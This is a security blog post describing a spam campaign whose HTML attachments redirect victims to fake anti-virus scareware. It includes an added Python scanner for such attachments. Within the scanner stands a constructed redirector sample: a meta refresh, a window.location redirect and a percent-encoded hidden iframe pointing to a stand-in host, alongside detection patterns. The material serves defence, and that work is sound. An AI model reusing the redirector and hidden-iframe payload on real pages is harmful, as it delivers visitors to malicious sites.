Malicious spammers launch major fake anti-virus attack

Filed Under: Spam, Video

SophosLabs' worldwide network of email-monitoring stations has seen a tidal wave of malicious messages being spammed out with an HTML attachment that redirects the recipient's web browser to a fake anti-virus attack.

The emails have subject names such as:

  • Parking Permit and/or Benefit Card Order Receipt - <random number>
  • You're invited to view my photos!
  • Appointment Confirmation
  • Your Bell e-bill is ready
  • Your Vistaprint Order Is Confirmed
  • Vistaprint Canadian Tax Invoice (<random number>)

With emails posing as credit card charges, order confirmations and free-to-view holiday snaps from Bermuda, it would be no surprise if some users opened the attached files, which go by names such as Benefit Card Order Receipt.html, Print this album.html, Appointment Confirmation.html, e-bill.html, Vistaprint Order Invoice.html and Tax Invoice.html.

Here's a closer look at two of the current spam messages we're seeing:

[Image: "Parking Permit" malicious email]

[Image: "You're invited to view my photos!" malicious email]

Opening the attached HTML file, however, redirects your web browser to a hacked website containing a malicious iframe (which Sophos detects as Troj/Iframe-FK). That iframe, in turn, loads scripts from other websites, and those scripts finally serve up the fake anti-virus attack that Sophos detects as Mal/FakeAV-EI.
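Because the attachment is only a redirector, the tricks it relies on are visible to a static scan before anyone double-clicks it. The following is an added example, not Sophos's detection logic and not code from the original post: a small Python triage script that walks an HTML attachment looking for the redirect techniques described above (meta refresh, script-driven location changes, remote script includes and hidden iframes) and that decodes percent-encoded strings handed to unescape() so an iframe buried inside the encoding is found as well. The two sample attachments and the hacked-site.example hostname are constructed for the example.

```python
"""Static triage of HTML e-mail attachments for redirector behaviour.

Flags what a Troj/JSRedir-style attachment needs in order to bounce the
browser to a compromised site: meta refresh, script-driven location
changes, remote script includes, hidden iframes, and percent-encoded
payloads passed through unescape() / document.write().
"""
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# window.location = ..., location.href = ..., location.replace(...) etc.
LOCATION_RE = re.compile(
    r"\b(?:window|document|top|self|parent)?\.?location(?:\.href)?\s*=(?!=)"
    r"|\blocation\.(?:replace|assign)\s*\(", re.I)
# Helpers that obfuscated droppers lean on.
OBFUSCATION_RE = re.compile(
    r"\b(?:eval|unescape|String\.fromCharCode|document\.write)\s*\(", re.I)
# First string literal handed to unescape(); decoded and rescanned below.
UNESCAPE_ARG_RE = re.compile(r"unescape\s*\(\s*(['\"])(.*?)\1", re.I | re.S)


class AttachmentScanner(HTMLParser):
    """Collects findings while walking the attachment's markup."""

    def __init__(self, depth=0):
        super().__init__()
        self.findings = []
        self.depth = depth           # recursion depth for decoded payloads
        self._in_script = False
        self._script = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append("meta refresh redirect: " + a.get("content", ""))
        elif tag in ("iframe", "frame"):
            style = a.get("style", "").replace(" ", "").lower()
            tiny = (a.get("width", "").strip("px ") in ("0", "1")
                    or a.get("height", "").strip("px ") in ("0", "1"))
            hidden = "display:none" in style or "visibility:hidden" in style
            kind = "hidden iframe" if (tiny or hidden) else "iframe"
            self.findings.append(f"{kind} to {a.get('src', '?')}")
        elif tag == "script":
            self._in_script = True
            src = a.get("src", "")
            if re.match(r"(?:https?:)?//", src, re.I):
                self.findings.append("remote script include: " + src)

    def handle_data(self, data):
        # HTMLParser hands <script> bodies to handle_data as CDATA chunks.
        if self._in_script:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            self._inspect_script("".join(self._script))
            self._script = []

    def _inspect_script(self, js):
        for m in LOCATION_RE.finditer(js):
            self.findings.append("script redirect: " + m.group(0).strip())
        for m in OBFUSCATION_RE.finditer(js):
            self.findings.append("obfuscation helper: " + m.group(0).rstrip("( "))
        # Decode what unescape() would produce and scan it as markup, so an
        # iframe hidden inside the percent-encoding is reported too.
        if self.depth < 2:
            for m in UNESCAPE_ARG_RE.finditer(js):
                inner = AttachmentScanner(self.depth + 1)
                inner.feed(unquote(m.group(2)))
                inner.close()
                self.findings.extend("decoded payload -> " + f for f in inner.findings)


def scan_attachment(html):
    """Return the list of findings for one HTML attachment (empty = nothing seen)."""
    scanner = AttachmentScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def is_suspicious(html):
    """An invoice or photo album has no business redirecting or framing anything."""
    return bool(scan_attachment(html))


# Constructed samples; neither is a real attachment from the campaign.
REDIRECTOR = (
    '<html><head><title>Order Invoice</title>\n'
    '<meta http-equiv="refresh" content="0;url=http://hacked-site.example/index.php">\n'
    '</head><body><p>Loading your invoice...</p>\n'
    '<script type="text/javascript">\n'
    'window.location = "http://hacked-site.example/index.php";\n'
    'document.write(unescape("%3Ciframe%20src%3D%22http%3A//hacked-site.example/in.php%22'
    '%20width%3D0%20height%3D0%3E%3C/iframe%3E"));\n'
    '</script></body></html>'
)
INVOICE = (
    '<html><body><h1>Order receipt</h1>\n'
    '<table><tr><td>Parking permit</td><td>$45.00</td></tr></table>\n'
    '<p>Questions? Visit <a href="https://shop.example/help">our help page</a>.</p>\n'
    '</body></html>'
)

if __name__ == "__main__":
    for name, sample in (("REDIRECTOR", REDIRECTOR), ("INVOICE", INVOICE)):
        print(name, "suspicious" if is_suspicious(sample) else "clean")
        for finding in scan_attachment(sample):
            print("  -", finding)
```

Plain hyperlinks are deliberately not flagged: a legitimate receipt links out, but it never redirects on open, frames a zero-size page or writes decoded markup into itself. A scanner like this belongs at the mail gateway in front of the signature engine, and its findings are the artefacts worth logging (the refresh target and the framed URL) when a campaign like this one is being tracked.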

Mal/FakeAV-EI often disguises itself as a bogus version of McAfee VirusScan - regular readers of the blog may remember another attack involving this scareware that I wrote about last month.

Fraser Howard, a principal researcher in SophosLabs, recently made the following YouTube video explaining the problem of fake anti-virus software:

[Video: Fraser Howard of SophosLabs on fake anti-virus software]

(Enjoy this video? You can check out more on the SophosLabs YouTube channel and subscribe if you like)

We also have a white paper which explains the problem of fake anti-virus in greater detail.

So, in this attack, the hackers are combining human gullibility, poorly protected websites, and the tried-and-tested trick of scaring users into believing their PC has security problems, all to con them into downloading more dangerous software or handing over their credit card details.

Sophos is detecting the various HTML files attached to the spam emails as Troj/JSRedir-CH.



About the author

Graham Cluley runs his own award-winning computer security blog at, and is a veteran of the anti-virus industry having worked for a number of security companies since the early 1990s. Now an independent security analyst, he regularly makes media appearances and gives computer security presentations. Follow him on Twitter at @gcluley